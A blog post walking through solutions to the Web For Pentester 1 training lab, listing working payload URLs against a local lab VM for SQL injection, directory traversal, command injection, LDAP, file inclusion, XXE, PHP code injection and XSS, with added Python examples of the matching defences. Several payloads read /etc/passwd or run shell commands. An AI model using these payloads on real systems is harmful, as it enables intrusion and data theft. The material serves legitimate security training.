Tuesday 10 January 2017

Web For Pentester 1 solutions all in one



Web For Pentester 1 solutions, all in one. First, download the ISO file from HERE.


Web For Pentester 1:

SQL injection:
1. http://192.168.145.158/sqli/example1.php?name=root
http://192.168.145.158/sqli/example1.php?name=root' or '1'='1
2. http://192.168.145.158/sqli/example2.php?name=root
http://192.168.145.158/sqli/example2.php?name=root' or '1'='1
This gives a "no space" error, so use tabs instead:
http://192.168.145.158/sqli/example2.php?name=root'\tor\t'1'='1
URL-encode \t as %09:
http://192.168.145.158/sqli/example2.php?name=root'%09or%09'1'='1
3. http://192.168.145.158/sqli/example3.php?name=root
http://192.168.145.158/sqli/example3.php?name=root'%09or%09'1'='1
This gives a space error, so use /**/ instead:
http://192.168.145.158/sqli/example3.php?name=root'/**/or/**/'1'='1
4. http://192.168.145.158/sqli/example4.php?id=2
http://192.168.145.158/sqli/example4.php?id=2'/**/or/**/'1'='1
http://192.168.145.158/sqli/example4.php?id=2 or 1=1
5. http://192.168.145.158/sqli/example5.php?id=2
http://192.168.145.158/sqli/example5.php?id=2 or 1=1
6. http://192.168.145.158/sqli/example6.php?id=2
http://192.168.145.158/sqli/example6.php?id=2 or 1=1
7. http://192.168.145.158/sqli/example7.php?id=2
http://192.168.145.158/sqli/example7.php?id=2%0A or 1=1
8. http://192.168.145.158/sqli/example8.php?order=name
http://192.168.145.158/sqli/example8.php?order=name
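
Why the space filters in examples 2 and 3 do not help, and what does: the block below is an added example, not code from this post or from the lab. It is a Python/sqlite3 stand-in; the table, its rows and the function names are assumptions made for illustration.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the lab's users table (constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [(1, "admin"), (2, "root"), (3, "user1")])
    return db

def lookup_filtered(db, name, banned):
    """Blacklist style: reject input matching `banned`, then concatenate it into SQL."""
    if re.search(banned, name):
        raise ValueError("rejected by filter")
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, name):
    """Bound parameter: the driver passes the value as data, never as SQL text."""
    rows = db.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]

# The name= values from examples 1-3 above, URL-decoded.
PAYLOADS = {
    "space":   "root' or '1'='1",
    "tab":     "root'\tor\t'1'='1",
    "comment": "root'/**/or/**/'1'='1",
}

if __name__ == "__main__":
    db = make_db()
    for label, value in PAYLOADS.items():
        for banned in (r" ", r"\s"):   # "no spaces" filter, then "no whitespace" filter
            try:
                rows = lookup_filtered(db, value, banned)
            except ValueError as exc:
                rows = str(exc)
            print(f"{label:8} filter={banned!r:6} -> {rows}")
        print(f"{label:8} parameterized -> {lookup_parameterized(db, value)}")
```

Each stricter blacklist is bypassed by the next separator, while the bound-parameter query returns no rows for all three values.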
-------------------------------------------------------------------
Directory traversal:
1. http://192.168.145.158/dirtrav/example1.php?file=../../../../../etc/passwd
2. http://192.168.145.158/dirtrav/example2.php?file=/var/www/files/../../../../../etc/passwd
3. http://192.168.145.158/dirtrav/example3.php?file=../../../../../etc/passwd
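
Example 2 keeps the expected /var/www/files prefix and still leaves the directory. The block below is an added example, not code from this post or from the lab: it compares a prefix check (an assumed reconstruction of what such a filter looks like) with canonicalizing the path before checking containment. Function names are hypothetical.

```python
import os

BASE = "/var/www/files"  # base directory that appears in example 2 above

def allowed_by_prefix(path):
    """Weak check: only inspects how the string begins."""
    return path.startswith(BASE)

def resolve_inside(base, user_path):
    """Return the canonical path if it stays under base, else None."""
    base_real = os.path.realpath(base)
    # join() discards base_real when user_path is absolute; realpath() then
    # collapses every ../ and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate

# file= values from the section above, plus one benign name (constructed).
SAMPLES = [
    "../../../../../etc/passwd",
    "/var/www/files/../../../../../etc/passwd",
    "hacker.png",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r}: prefix_ok={allowed_by_prefix(s)} "
              f"resolved={resolve_inside(BASE, s)}")
```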
-------------------------------------------------------------------
Command Injection:
1. http://192.168.145.158/commandexec/example1.php?ip=127.0.0.1
http://192.168.145.158/commandexec/example1.php?ip=127.0.0.1;id
http://192.168.145.158/commandexec/example1.php?ip=127.0.0.1| id
http://192.168.145.158/commandexec/example1.php?ip=127.0.0.1;ls;id;ls -ltr;pwd
2. http://192.168.145.158/commandexec/example2.php?ip=127.0.0.1
Just insert %0a: http://192.168.145.158/commandexec/example2.php?ip=127.0.0.1%0als%0apwd%0acat /etc/passwd
3. http://192.168.145.158/commandexec/example3.php?ip=127.0.0.1
Still pending.
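
The %0a trick in example 2 (and in SQL example 7) is what gets past a pattern that is anchored per line instead of over the whole input. The block below is an added example, not code from this post or from the lab; the shape of the weak filter is an assumption inferred from the payload, and the function names are hypothetical. It also shows the fix: parse the value as an address and run ping without a shell.

```python
import ipaddress
import re
import subprocess

IPV4 = r"\d{1,3}(\.\d{1,3}){3}"
# Assumed shape of the weak filter: ^...$ anchors in multi-line mode.
WEAK = re.compile("^" + IPV4 + "$", re.MULTILINE)

def weak_accepts(value):
    """True if any single line of the input looks like an IPv4 address."""
    return WEAK.search(value) is not None

def strict_accepts(value):
    """fullmatch() must consume the whole string, trailing newline included."""
    return re.fullmatch(IPV4, value) is not None

def ping_argv(value):
    """Build the argument vector for ping, or raise ValueError."""
    addr = ipaddress.ip_address(value)  # rejects anything but one bare address
    return ["ping", "-c", "2", str(addr)]

def ping(value):
    """Run ping without a shell, so ; | and newlines are never interpreted."""
    return subprocess.run(ping_argv(value), capture_output=True,
                          text=True, timeout=15).stdout

# ip= values from the section above, URL-decoded (%0a is a newline).
SAMPLES = ["127.0.0.1", "127.0.0.1;id", "127.0.0.1| id", "127.0.0.1\nls\npwd"]

if __name__ == "__main__":
    for s in SAMPLES:
        try:
            argv = ping_argv(s)
        except ValueError:
            argv = "rejected"
        print(repr(s), weak_accepts(s), strict_accepts(s), argv)
```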

-------------------------------------------------------------
LDAP attack:
1. http://192.168.145.158/ldap/example1.php?username=hacker&password=hacker
http://192.168.145.158/ldap/example1.php
2. http://192.168.145.158/ldap/example2.php?name=hacker&password=hacker
http://192.168.145.158/ldap/example2.php?name=hacker)(cn=*))&password=hacker

-------------------------------------------------------------------------
File include:
1. http://192.168.145.158/fileincl/example1.php?page=intro.php
http://192.168.145.158/fileincl/example1.php?page=../../../etc/passwd
2. http://192.168.145.158/fileincl/example2.php?page=intro
http://192.168.145.158/fileincl/example2.php?page=../../../etc/passwd
-------------------------------------------------------------------------
XML attacks:
1. http://192.168.145.158/xml/example1.php?xml=<test>hacker</test>
You have to URL-encode this one and paste it after xml=:
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>

http://192.168.145.158/xml/example1.php?xml=%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2ftest%3E
2. http://192.168.145.158/xml/example2.php?name=hacker
http://192.168.145.158/xml/example2.php?name=' or 1=1]
---------------------------------------------------------------------------
Code injection:
1. http://192.168.145.158/codeexec/example1.php?name=hacker
http://192.168.145.158/codeexec/example1.php?name=hacker"; system("ls"); //
2. http://192.168.145.158/codeexec/example2.php?order=id
http://192.168.145.158/codeexec/example2.php?order=id);}system('ls');%23
3. http://192.168.145.158/codeexec/example3.php?new=hacker&pattern=/lamer/&base=Hello lamer
http://192.168.145.158/codeexec/example3.php?new=phpinfo()&pattern=/lamer/e&base=Hello lamer
http://192.168.145.158/codeexec/example3.php?new=system('ls')&pattern=/lamer/e&base=Hello lamer
4. http://192.168.145.158/codeexec/example4.php?name=hacker
http://192.168.145.158/codeexec/example4.php?name=hacke'.system("ls");%23

-------------------------------------------------------------------------------------
XSS:
1. http://192.168.145.158/xss/example1.php?name=hacker
http://192.168.145.158/xss/example1.php?name=hacker<script>alert('hell')</script>
2. http://192.168.145.158/xss/example2.php?name=hacker
http://192.168.145.158/xss/example2.php?name=hacker<SCript>alert('hell')</SCript>
3. http://192.168.145.158/xss/example3.php?name=hacker
http://192.168.145.158/xss/example3.php?name=hacker<scri<script>pt>alert('xss')</scri</script>pt>
4. http://192.168.145.158/xss/example4.php?name=hacker
http://192.168.145.158/xss/example4.php?name=hacker<img src='nonexistant' onerror='alert("xss")' />
5. http://192.168.145.158/xss/example5.php?name=hacker
http://192.168.145.158/xss/example5.php?name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
6. http://192.168.145.158/xss/example6.php?name=hacker
http://192.168.145.158/xss/example6.php?name=hacket";alert('xss');"
7. http://192.168.145.158/xss/example7.php?name=hacker
http://192.168.145.158/xss/example7.php?name=hacker';alert('xss');'
8. http://192.168.145.158/xss/example8.php?name=hacker
http://192.168.145.158/xss/example8.php?name=hacker/"><script>alert('xss')</script>
9. http://192.168.145.158/xss/example9.php#hacker
http://192.168.145.158/xss/example9.php#<script>alert('anuj')</script>
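
Why tag stripping fails against the values in examples 3, 4 and 6, next to encoding for the output context: the block below is an added example, not code from this post or from the lab. It assumes, from the shape of the payloads, that example 3 deletes script tags in a single pass and that example 6 reflects the value into a JavaScript string; the function names are hypothetical.

```python
import html
import json
import re

def strip_script_tags(value):
    """Blacklist: delete <script> and </script> in one case-insensitive pass."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)

def html_text(value):
    """Encode for an HTML text or quoted-attribute context."""
    return html.escape(value, quote=True)

def js_string(value):
    """Encode for a JavaScript string literal inside a <script> block."""
    # json.dumps escapes quotes and backslashes; < is escaped as well so the
    # value cannot close the surrounding <script> element.
    return json.dumps(value).replace("<", "\\u003c")

# name= values from examples 3, 4 and 6 above.
NESTED = "hacker<scri<script>pt>alert('xss')</scri</script>pt>"
HANDLER = "hacker<img src='nonexistant' onerror='alert(\"xss\")' />"
QUOTE = "hacket\";alert('xss');\""

if __name__ == "__main__":
    # Removing the inner tags reassembles the outer ones.
    print("stripped nested :", strip_script_tags(NESTED))
    # No script tag involved, so the blacklist changes nothing.
    print("stripped handler:", strip_script_tags(HANDLER))
    # Encoded output contains no markup characters at all.
    print("html-encoded    :", html_text(NESTED))
    print("html-encoded    :", html_text(HANDLER))
    # The quote stays inside the string literal instead of ending it.
    print("js literal      :", "var a = " + js_string(QUOTE) + ";")
```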

Enjoy:
